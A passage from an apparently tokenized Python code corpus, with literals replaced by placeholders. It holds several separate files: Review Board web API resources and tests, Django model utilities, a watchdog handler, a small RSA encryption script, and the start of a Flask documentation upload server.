<EOL> @ webapi_request_fields ( <EOL> optional = dict ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } , <EOL> } , ** BaseDiffCommentResource . OPTIONAL_UPDATE_FIELDS ) , <EOL> allow_unknown = True , <EOL> ) <EOL> def update ( self , request , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> resources . review_request . get_object ( request , * args , ** kwargs ) <EOL> review = resources . review . get_object ( request , * args , ** kwargs ) <EOL> diff_comment = self . get_object ( request , * args , ** kwargs ) <EOL> except ObjectDoesNotExist : <EOL> return DOES_NOT_EXIST <EOL> if self . should_update_issue_status ( diff_comment , ** kwargs ) : <EOL> return self . update_issue_status ( request , self , * args , ** kwargs ) <EOL> if not resources . review . has_modify_permissions ( request , review ) : <EOL> return self . get_no_access_error ( request ) <EOL> self . update_comment ( diff_comment , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ** kwargs ) <EOL> return <NUM_LIT:200> , { <EOL> self . item_result_key : diff_comment , <EOL> } <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseDiffCommentResource ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseDiffCommentResource ) <EOL> def get_list ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> review_diff_comment_resource = ReviewDiffCommentResource ( ) </s>
<s> from __future__ import unicode_literals <EOL> from djblets . util . decorators import augment_method_from <EOL> from reviewboard . webapi . decorators import webapi_check_local_site <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . resources . base_watched_object import BaseWatchedObjectResource <EOL> class WatchedReviewRequestResource ( BaseWatchedObjectResource ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> uri_name = '<STR_LIT>' <EOL> profile_field = '<STR_LIT>' <EOL> star_function = '<STR_LIT>' <EOL> unstar_function = '<STR_LIT>' <EOL> @ property <EOL> def watched_resource ( self ) : <EOL> """<STR_LIT>""" <EOL> return resources . review_request <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def get_list ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def create ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ webapi_check_local_site <EOL> @ augment_method_from ( BaseWatchedObjectResource ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def serialize_object ( self , obj , * args , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT:id>' : obj . display_id , <EOL> self . item_result_key : obj , <EOL> } <EOL> def get_watched_object ( self , queryset , obj_id , local_site_name = None , <EOL> * args , ** kwargs ) : <EOL> if local_site_name : <EOL> return queryset . get ( local_id = obj_id ) <EOL> else : <EOL> return queryset . get ( pk = obj_id ) <EOL> watched_review_request_resource = WatchedReviewRequestResource ( ) </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> from django . utils import six <EOL> from kgb import SpyAgency <EOL> from reviewboard . hostingsvcs . github import GitHub <EOL> from reviewboard . hostingsvcs . models import HostingServiceAccount <EOL> from reviewboard . hostingsvcs . repository import RemoteRepository <EOL> from reviewboard . hostingsvcs . utils . paginator import APIPaginator <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . tests . base import BaseWebAPITestCase <EOL> from reviewboard . webapi . tests . mimetypes import ( <EOL> remote_repository_item_mimetype , <EOL> remote_repository_list_mimetype ) <EOL> from reviewboard . webapi . tests . mixins import BasicTestsMetaclass <EOL> from reviewboard . webapi . tests . urls import ( get_remote_repository_item_url , <EOL> get_remote_repository_list_url ) <EOL> def _compare_item ( self , item_rsp , remote_repository ) : <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:id>' ] , remote_repository . id ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:name>' ] , remote_repository . name ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . owner ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . scm_type ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT:path>' ] , remote_repository . path ) <EOL> self . assertEqual ( item_rsp [ '<STR_LIT>' ] , remote_repository . mirror_path ) <EOL> class RemoteRepositoryTestPaginator ( APIPaginator ) : <EOL> def __init__ ( self , results ) : <EOL> self . results = results <EOL> super ( RemoteRepositoryTestPaginator , self ) . __init__ ( client = None , <EOL> url = '<STR_LIT>' ) <EOL> def fetch_url ( self , url ) : <EOL> return { <EOL> '<STR_LIT:data>' : self . results , <EOL> } <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceListTests ( SpyAgency , BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . remote_repository <EOL> basic_get_use_admin = True <EOL> compare_item = _compare_item <EOL> def setup_http_not_allowed_list_test ( self , user ) : <EOL> account = HostingServiceAccount . objects . create ( service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' ) <EOL> return get_remote_repository_list_url ( account ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name , <EOL> populate_items ) : <EOL> account = HostingServiceAccount . objects . create ( <EOL> service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' , <EOL> local_site = self . get_local_site_or_none ( name = local_site_name ) , <EOL> data = json . dumps ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) ) <EOL> service = account . service <EOL> remote_repositories = [ <EOL> RemoteRepository ( service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) , <EOL> RemoteRepository ( service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) , <EOL> ] <EOL> paginator = RemoteRepositoryTestPaginator ( remote_repositories ) <EOL> self . spy_on ( GitHub . get_remote_repositories , <EOL> call_fake = lambda * args , ** kwargs : paginator ) <EOL> return ( get_remote_repository_list_url ( account , local_site_name ) , <EOL> remote_repository_list_mimetype , <EOL> remote_repositories ) <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceItemTests ( SpyAgency , BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . remote_repository <EOL> basic_get_use_admin = True <EOL> compare_item = _compare_item <EOL> def setup_http_not_allowed_item_test ( self , user ) : <EOL> account = HostingServiceAccount . objects . create ( service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' ) <EOL> remote_repository = RemoteRepository ( <EOL> account . service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' ) <EOL> return get_remote_repository_item_url ( remote_repository ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name ) : <EOL> account = HostingServiceAccount . objects . create ( <EOL> service_name = '<STR_LIT>' , <EOL> username = '<STR_LIT>' , <EOL> local_site = self . get_local_site_or_none ( name = local_site_name ) , <EOL> data = json . dumps ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) ) <EOL> remote_repository = RemoteRepository ( <EOL> account . service , <EOL> repository_id = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> owner = '<STR_LIT>' , <EOL> scm_type = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> mirror_path = '<STR_LIT>' ) <EOL> self . spy_on ( GitHub . get_remote_repository , <EOL> call_fake = lambda * args , ** kwargs : remote_repository ) <EOL> return ( get_remote_repository_item_url ( remote_repository , <EOL> local_site_name ) , <EOL> remote_repository_item_mimetype , <EOL> remote_repository ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils import six <EOL> from djblets . testing . decorators import add_fixtures <EOL> from djblets . webapi . errors import DOES_NOT_EXIST , PERMISSION_DENIED <EOL> from reviewboard . webapi . resources import resources <EOL> from reviewboard . webapi . tests . base import BaseWebAPITestCase <EOL> from reviewboard . webapi . tests . mimetypes import ( <EOL> watched_review_group_item_mimetype , <EOL> watched_review_group_list_mimetype ) <EOL> from reviewboard . webapi . tests . mixins import BasicTestsMetaclass <EOL> from reviewboard . webapi . tests . urls import ( <EOL> get_review_group_item_url , <EOL> get_watched_review_group_item_url , <EOL> get_watched_review_group_list_url ) <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceListTests ( BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . watched_review_group <EOL> def compare_item ( self , item_rsp , obj ) : <EOL> watched_rsp = item_rsp [ '<STR_LIT>' ] <EOL> self . assertEqual ( watched_rsp [ '<STR_LIT:id>' ] , obj . pk ) <EOL> self . assertEqual ( watched_rsp [ '<STR_LIT:name>' ] , obj . name ) <EOL> def setup_basic_get_test ( self , user , with_local_site , local_site_name , <EOL> populate_items ) : <EOL> if populate_items : <EOL> group = self . create_review_group ( with_local_site = with_local_site ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> items = [ group ] <EOL> else : <EOL> items = [ ] <EOL> return ( get_watched_review_group_list_url ( user . username , <EOL> local_site_name ) , <EOL> watched_review_group_list_mimetype , <EOL> items ) <EOL> def setup_basic_post_test ( self , user , with_local_site , local_site_name , <EOL> post_valid_data ) : <EOL> group = self . create_review_group ( with_local_site = with_local_site ) <EOL> if post_valid_data : <EOL> post_data = { <EOL> '<STR_LIT>' : group . name , <EOL> } <EOL> else : <EOL> post_data = { } <EOL> return ( get_watched_review_group_list_url ( user . username , <EOL> local_site_name ) , <EOL> watched_review_group_item_mimetype , <EOL> post_data , <EOL> [ group ] ) <EOL> def check_post_result ( self , user , rsp , group ) : <EOL> profile = user . get_profile ( ) <EOL> self . assertIn ( group , profile . starred_groups . all ( ) ) <EOL> def test_post_with_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> rsp = self . api_post ( <EOL> get_watched_review_group_list_url ( self . user . username ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_post_with_site_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _login_user ( local_site = True ) <EOL> rsp = self . api_post ( <EOL> get_watched_review_group_list_url ( user . username , <EOL> self . local_site_name ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> @ six . add_metaclass ( BasicTestsMetaclass ) <EOL> class ResourceItemTests ( BaseWebAPITestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> test_http_methods = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sample_api_url = '<STR_LIT>' <EOL> resource = resources . watched_review_group <EOL> def setup_http_not_allowed_item_test ( self , user ) : <EOL> return get_watched_review_group_item_url ( user . username , '<STR_LIT>' ) <EOL> def setup_basic_delete_test ( self , user , with_local_site , local_site_name ) : <EOL> group = self . create_review_group ( with_local_site = with_local_site ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> return ( get_watched_review_group_item_url ( user . username , group . name , <EOL> local_site_name ) , <EOL> [ profile , group ] ) <EOL> def check_delete_result ( self , user , profile , group ) : <EOL> self . assertNotIn ( group , profile . starred_groups . all ( ) ) <EOL> def test_delete_with_does_not_exist_error ( self ) : <EOL> """<STR_LIT>""" <EOL> rsp = self . api_delete ( <EOL> get_watched_review_group_item_url ( self . user . username , <EOL> '<STR_LIT>' ) , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , DOES_NOT_EXIST . code ) <EOL> def test_get ( self ) : <EOL> """<STR_LIT>""" <EOL> group = self . create_review_group ( ) <EOL> profile = self . user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> expected_url = self . base_url + get_review_group_item_url ( group . name ) <EOL> self . api_get ( <EOL> get_watched_review_group_item_url ( self . user . username , group . pk ) , <EOL> expected_status = <NUM_LIT> , <EOL> expected_headers = { <EOL> '<STR_LIT>' : expected_url , <EOL> } ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_get_with_site ( self ) : <EOL> """<STR_LIT>""" <EOL> user = self . _login_user ( local_site = True ) <EOL> group = self . create_review_group ( with_local_site = True ) <EOL> profile = user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> expected_url = ( <EOL> self . base_url + <EOL> get_review_group_item_url ( group . name , self . local_site_name ) ) <EOL> self . api_get ( <EOL> get_watched_review_group_item_url ( user . username , group . pk , <EOL> self . local_site_name ) , <EOL> expected_status = <NUM_LIT> , <EOL> expected_headers = { <EOL> '<STR_LIT>' : expected_url , <EOL> } ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_get_with_site_no_access ( self ) : <EOL> """<STR_LIT>""" <EOL> group = self . create_review_group ( with_local_site = True ) <EOL> profile = self . user . get_profile ( ) <EOL> profile . starred_groups . add ( group ) <EOL> rsp = self . api_get ( <EOL> get_watched_review_group_item_url ( self . user . username , group . pk , <EOL> self . local_site_name ) , <EOL> expected_status = <NUM_LIT> ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( rsp [ '<STR_LIT>' ] [ '<STR_LIT:code>' ] , PERMISSION_DENIED . code ) </s>
<s> from . test import TestCase <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from django . core . exceptions import ValidationError <EOL> from os import path as fs_path <EOL> from time import strftime <EOL> from django . utils . text import slugify <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext as _ <EOL> from django . core . cache import cache <EOL> from django . conf import settings <EOL> from django . db import models <EOL> from collections import OrderedDict <EOL> try : <EOL> from django . utils . deconstruct import deconstructible <EOL> except ImportError : <EOL> def deconstructible ( old_class ) : <EOL> return old_class <EOL> UPLOAD_TO_OPTIONS = { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> @ deconstructible <EOL> class UploadTo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . options = UPLOAD_TO_OPTIONS . copy ( ) <EOL> if hasattr ( settings , "<STR_LIT>" ) : <EOL> self . options . update ( settings . UPLOAD_TO_OPTIONS ) <EOL> self . options . update ( kwargs ) <EOL> @ staticmethod <EOL> def get_file_info ( full_filename ) : <EOL> filename = fs_path . basename ( full_filename ) . lower ( ) <EOL> filename , file_ext = filename . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> return { <EOL> "<STR_LIT:filename>" : filename , <EOL> "<STR_LIT>" : file_ext , <EOL> "<STR_LIT>" : full_filename <EOL> } <EOL> def validate_file_info ( self , file_info ) : <EOL> file_ext = file_info [ "<STR_LIT>" ] <EOL> if file_ext in self . options [ "<STR_LIT>" ] : <EOL> raise ValueError ( "<STR_LIT>" % file_ext ) <EOL> def generate_file_name ( self , instance , file_info ) : <EOL> model_name = instance . __class__ . __name__ <EOL> filename = file_info [ "<STR_LIT:filename>" ] <EOL> max_len = self . options [ "<STR_LIT>" ] <EOL> file_info [ "<STR_LIT:filename>" ] = slugify ( filename ) [ : max_len ] <EOL> return strftime ( self . options [ "<STR_LIT>" ] ) . format ( <EOL> model_name = model_name , <EOL> instance = instance , <EOL> ** file_info <EOL> ) <EOL> def __call__ ( self , instance , full_filename ) : <EOL> """<STR_LIT>""" <EOL> full_filename = six . text_type ( full_filename ) <EOL> file_info = self . get_file_info ( full_filename ) <EOL> self . validate_file_info ( file_info ) <EOL> return self . generate_file_name ( instance , file_info ) <EOL> def upload_to ( instance , full_filename ) : <EOL> upload_to_obj = UploadTo ( ) <EOL> return upload_to_obj ( instance , full_filename ) <EOL> def cached_model_property ( model_method = None , readonly = True , cache_timeout = None ) : <EOL> """<STR_LIT>""" <EOL> def func ( f ) : <EOL> def _get_cache_key ( obj ) : <EOL> """<STR_LIT>""" <EOL> model_name = getattr ( obj , "<STR_LIT>" ) . db_table <EOL> method_name = f . __name__ <EOL> return "<STR_LIT>" % ( model_name , obj . pk , method_name ) <EOL> def get_x ( obj ) : <EOL> cache_key = _get_cache_key ( obj ) <EOL> result = cache . get ( cache_key ) <EOL> if result is None : <EOL> result = f ( obj ) <EOL> set_x ( obj , result ) <EOL> return result <EOL> def del_x ( obj ) : <EOL> """<STR_LIT>""" <EOL> cache_key = _get_cache_key ( obj ) <EOL> cache . delete ( cache_key ) <EOL> def set_x ( obj , value ) : <EOL> """<STR_LIT>""" <EOL> cache_key = _get_cache_key ( obj ) <EOL> if cache_timeout is None : <EOL> cache . set ( cache_key , value ) <EOL> else : <EOL> cache . set ( cache_key , value , cache_timeout ) <EOL> if readonly : <EOL> return property ( fget = get_x , fdel = del_x ) <EOL> else : <EOL> return property ( fget = get_x , fset = set_x , fdel = del_x ) <EOL> if model_method : <EOL> return func ( model_method ) <EOL> return func <EOL> class Choices ( OrderedDict ) : <EOL> """<STR_LIT>""" <EOL> _read_only = True <EOL> _choices_id = None <EOL> def __init__ ( self , choices , order_by = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . _read_only = False <EOL> super ( Choices , self ) . __init__ ( choices ) <EOL> self . _choices = _choices = [ ] <EOL> self . _order_by = order_by <EOL> if not choices : <EOL> return <EOL> choice_ids = set ( ) <EOL> for choice_code , choice_options in self . items ( ) : <EOL> if not issubclass ( choice_options . __class__ , dict ) : <EOL> choice_options = { "<STR_LIT:id>" : choice_options } <EOL> self [ choice_code ] = choice_options <EOL> choice_id = choice_options [ "<STR_LIT:id>" ] <EOL> choice_ids . add ( choice_id ) <EOL> if "<STR_LIT>" not in choice_options : <EOL> choice_options [ "<STR_LIT>" ] = choice_code . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . capitalize ( ) <EOL> display = choice_options [ "<STR_LIT>" ] <EOL> _choices . append ( ( choice_id , _ ( display ) ) ) <EOL> if order_by == "<STR_LIT>" : <EOL> _choices . sort ( key = lambda x : x [ <NUM_LIT:1> ] ) <EOL> elif order_by == "<STR_LIT:id>" : <EOL> _choices . sort ( key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> self . _read_only = True <EOL> def get_display_name ( self , choice_id ) : <EOL> """<STR_LIT>""" <EOL> return self . get_value ( choice_id , "<STR_LIT>" ) <EOL> def get_value ( self , choice_id , choice_key , raise_exception = True ) : <EOL> """<STR_LIT>""" <EOL> if self . _choices_id is None : <EOL> self . _choices_id = { item [ "<STR_LIT:id>" ] : ( key , item ) for key , item in six . iteritems ( self ) } <EOL> choice_name , choice = self . _choices_id [ choice_id ] <EOL> if choice_key is None : <EOL> return choice_name <EOL> elif raise_exception : <EOL> return choice [ choice_key ] <EOL> else : <EOL> return choice . get ( choice_key ) <EOL> def get_code_name ( self , choice_id ) : <EOL> """<STR_LIT>""" <EOL> return self . get_value ( choice_id , choice_key = None ) <EOL> def __getattr__ ( self , attr_name ) : <EOL> if attr_name in self : <EOL> return self [ attr_name ] [ "<STR_LIT:id>" ] <EOL> raise AttributeError ( "<STR_LIT>" % ( attr_name , self . __class__ . __name__ ) ) <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _choices <EOL> def __setattr__ ( self , attr , * args ) : <EOL> if self . _read_only and attr in self : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( Choices , self ) . __setattr__ ( attr , * args ) <EOL> def __setitem__ ( self , * args ) : <EOL> if self . _read_only : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> super ( Choices , self ) . __setitem__ ( * args ) <EOL> def __dir__ ( self ) : <EOL> return list ( self . keys ( ) ) + dir ( self . __class__ ) <EOL> def copy ( self ) : <EOL> new_self = Choices ( { } , order_by = self . _order_by ) <EOL> new_self . update ( self ) <EOL> return new_self <EOL> def update ( self , new_data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _read_only : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if not new_data : <EOL> new_data = kwargs <EOL> if not isinstance ( new_data , Choices ) : <EOL> new_data = Choices ( new_data ) <EOL> assert isinstance ( new_data , Choices ) <EOL> common_keys = set ( new_data . keys ( ) ) & set ( self . keys ( ) ) <EOL> if common_keys : <EOL> raise ValueError ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( common_keys ) ) <EOL> self . _choices += ( new_data ( ) ) <EOL> self . _choices_id = None <EOL> super ( Choices , self ) . update ( new_data ) <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , * args , ** kwargs ) : <EOL> self . _read_only = True <EOL> def __add__ ( self , other ) : <EOL> self . _read_only = False <EOL> with self . copy ( ) as result : <EOL> result . update ( other ) <EOL> self . _read_only = True <EOL> return result <EOL> class KeyValueContainer ( dict ) : <EOL> def __init__ ( self , seq = None , separator = "<STR_LIT:=>" , ** kwargs ) : <EOL> super ( KeyValueContainer , self ) . __init__ ( ) <EOL> self . sep = separator <EOL> if isinstance ( seq , six . string_types ) : <EOL> seq = self . _parse_string ( seq ) <EOL> if seq is not None : <EOL> seq = dict ( seq ) <EOL> kwargs . update ( seq ) <EOL> for key , value in six . iteritems ( kwargs ) : <EOL> self . __setitem__ ( key , value ) <EOL> def __str__ ( self ) : <EOL> result = [ ] <EOL> for key , val in six . iteritems ( self ) : <EOL> result . append ( u"<STR_LIT>" % ( key , self . sep , val ) ) <EOL> return u"<STR_LIT:\n>" . join ( result ) + "<STR_LIT:\n>" <EOL> def __setitem__ ( self , key , item ) : <EOL> if item is None : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item = six . text_type ( item ) <EOL> super ( KeyValueContainer , self ) . __setitem__ ( key , item ) <EOL> def __unicode__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def _parse_string ( self , value ) : <EOL> result = { } <EOL> if not value : <EOL> return result <EOL> for line in value . split ( "<STR_LIT:\n>" ) : <EOL> line = line . strip ( ) <EOL> if not line : <EOL> continue <EOL> if self . sep not in line : <EOL> raise ValueError ( _ ( "<STR_LIT>" ) % ( repr ( line ) , self . sep ) ) <EOL> key , value = [ val . strip ( ) for val in line . split ( self . sep , <NUM_LIT:1> ) ] <EOL> result [ key ] = value <EOL> return result <EOL> class KeyValueField ( models . TextField ) : <EOL> """<STR_LIT>""" <EOL> description = _ ( "<STR_LIT>" ) <EOL> empty_values = ( None , ) <EOL> def __init__ ( self , separator = "<STR_LIT:=>" , * args , ** kwargs ) : <EOL> self . separator = separator <EOL> super ( KeyValueField , self ) . __init__ ( * args , ** kwargs ) <EOL> def contribute_to_class ( self , cls , name , ** kwargs ) : <EOL> super ( KeyValueField , self ) . contribute_to_class ( cls , name , ** kwargs ) <EOL> setattr ( cls , name , property ( fget = self . get_value , fset = self . set_value ) ) <EOL> def set_value ( self , obj , value ) : <EOL> if isinstance ( value , six . string_types ) : <EOL> value = self . from_db_value ( value ) <EOL> elif not isinstance ( value , KeyValueContainer ) : <EOL> value = KeyValueContainer ( value ) <EOL> obj . __dict__ [ self . name ] = value <EOL> def get_value ( self , obj ) : <EOL> return obj . __dict__ [ self . name ] <EOL> def from_db_value ( self , value , * args , ** kwargs ) : <EOL> try : <EOL> return KeyValueContainer ( value , separator = self . separator ) <EOL> except ValueError as e : <EOL> raise ValidationError ( e ) <EOL> def get_prep_value ( self , value ) : <EOL> if value is None : <EOL> return "<STR_LIT>" <EOL> return six . text_type ( value ) <EOL> def deconstruct ( self ) : <EOL> name , path , args , kwargs = super ( KeyValueField , self ) . deconstruct ( ) <EOL> if self . separator != "<STR_LIT:=>" : <EOL> kwargs [ "<STR_LIT>" ] = self . separator <EOL> return name , path , args , kwargs </s>
<s> import time <EOL> from watchdog . events import PatternMatchingEventHandler <EOL> class CallbackModifiedHandler ( PatternMatchingEventHandler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , callback , * args , ** kwargs ) : <EOL> self . callback = callback <EOL> self . repeat_delay = kwargs . pop ( "<STR_LIT>" , <NUM_LIT:0> ) <EOL> self . last_fired_time = <NUM_LIT:0> <EOL> super ( CallbackModifiedHandler , self ) . __init__ ( * args , ** kwargs ) <EOL> def on_modified ( self , event ) : <EOL> super ( CallbackModifiedHandler , self ) . on_modified ( event ) <EOL> now = time . time ( ) <EOL> if self . last_fired_time + self . repeat_delay < now : <EOL> if not event . is_directory : <EOL> self . last_fired_time = now <EOL> self . callback ( ) </s>
<s> import rsa <EOL> def create_key ( ) : <EOL> ( pubkey , privkey ) = rsa . newkeys ( <NUM_LIT> ) <EOL> pub = pubkey . save_pkcs1 ( ) <EOL> pubfile = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> pubfile . write ( pub ) <EOL> pubfile . close ( ) <EOL> pri = privkey . save_pkcs1 ( ) <EOL> prifile = open ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> prifile . write ( pri ) <EOL> prifile . close ( ) <EOL> def load_public ( ) : <EOL> with open ( '<STR_LIT>' ) as publickfile : <EOL> p = publickfile . read ( ) <EOL> pubkey = rsa . PublicKey . load_pkcs1 ( p ) <EOL> return pubkey <EOL> def load_private ( ) : <EOL> with open ( '<STR_LIT>' ) as privatefile : <EOL> p = privatefile . read ( ) <EOL> privkey = rsa . PrivateKey . load_pkcs1 ( p ) <EOL> return privkey <EOL> def encrypt ( message ) : <EOL> crypto = rsa . encrypt ( message , pubkey ) <EOL> return crypto <EOL> def decrypt ( crypto ) : <EOL> message = rsa . decrypt ( crypto , privkey ) <EOL> return message <EOL> pubkey = load_public ( ) <EOL> privkey = load_private ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> message = '<STR_LIT:hello>' <EOL> en_str = encrypt ( message ) <EOL> print en_str <EOL> print decrypt ( en_str ) </s>
<s> import mock <EOL> from dccautomation import compat , common , inproc <EOL> class DefaultPortTests ( compat . unittest . TestCase ) : <EOL> def test_default ( self ) : <EOL> self . assertEqual ( inproc . get_default_port ( ) , inproc . DEFAULT_INPROC_PORT ) <EOL> def test_non_default ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , { common . ENV_INPROC_PORT : '<STR_LIT>' } ) : <EOL> self . assertEqual ( inproc . get_default_port ( ) , <NUM_LIT:20> ) </s>
<s> import os <EOL> from flask import abort , Flask , jsonify , redirect , render_template , request <EOL> from . filekeeper import delete_files , insert_link_to_latest , parse_docfiles , unpack_project <EOL> from . import getconfig <EOL> app = Flask ( __name__ ) <EOL> app . config [ '<STR_LIT>' ] = getconfig . max_content_mb * <NUM_LIT> * <NUM_LIT> <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' , '<STR_LIT>' ] ) <EOL> def hmfd ( ) : <EOL> if getconfig . readonly : <EOL> return abort ( <NUM_LIT> ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if not request . files : <EOL> return abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> unpack_project ( <EOL> request . files . values ( ) [ <NUM_LIT:0> ] . stream , <EOL> request . form , <EOL> getconfig . docfiles_dir ) <EOL> else : <EOL> assert request . method == '<STR_LIT>' <EOL> delete_files ( <EOL> request . args [ '<STR_LIT:name>' ] , <EOL> request . args . get ( '<STR_LIT:version>' ) , <EOL> getconfig . docfiles_dir , <EOL> request . args . get ( '<STR_LIT>' ) ) <EOL> return jsonify ( { '<STR_LIT:success>' : True } ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def home ( ) : <EOL> projects = parse_docfiles ( 